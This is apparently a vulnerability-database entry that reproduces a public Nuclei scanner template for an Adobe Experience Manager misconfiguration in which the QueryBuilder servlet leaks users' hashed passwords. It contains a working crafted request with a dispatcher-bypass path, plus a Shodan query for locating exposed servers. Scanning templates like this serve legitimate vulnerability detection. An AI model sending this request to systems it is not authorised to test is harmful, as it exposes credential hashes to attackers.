aem-hash-querybuilder: Query hashed password via QueryBuilder Servlet

日期: 2025-08-01 | 影响软件: aem-hash-querybuilder | POC: 已公开

漏洞描述

AEM hased password can be queried via QueryBuilder Servlet.

PoC代码[已公开]

id: aem-hash-querybuilder

info:
  name: Query hashed password via QueryBuilder Servlet
  author: DhiyaneshDk
  severity: medium
  description: AEM hased password can be queried via QueryBuilder Servlet.
  reference:
    - https://twitter.com/AEMSecurity/status/1372392101829349376
  classification:
    cpe: cpe:2.3:a:adobe:acs_aem_commons:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: adobe
    product: acs_aem_commons
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,misconfig,vuln

http:
  - raw:
      - |
        GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"success":true'
          - 'rep:password'
        condition: and
# digest: 490a00463044022006ec8d7671dea9387155b2d1c1c058e7297c8350244a191bef5aee84b0637c8e0220419bd8b6f7c1da4dfb53b6b19af95d697475fef1b78fb377a311b64cd0e6dd21:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/aem/aem-hash-querybuilder.yaml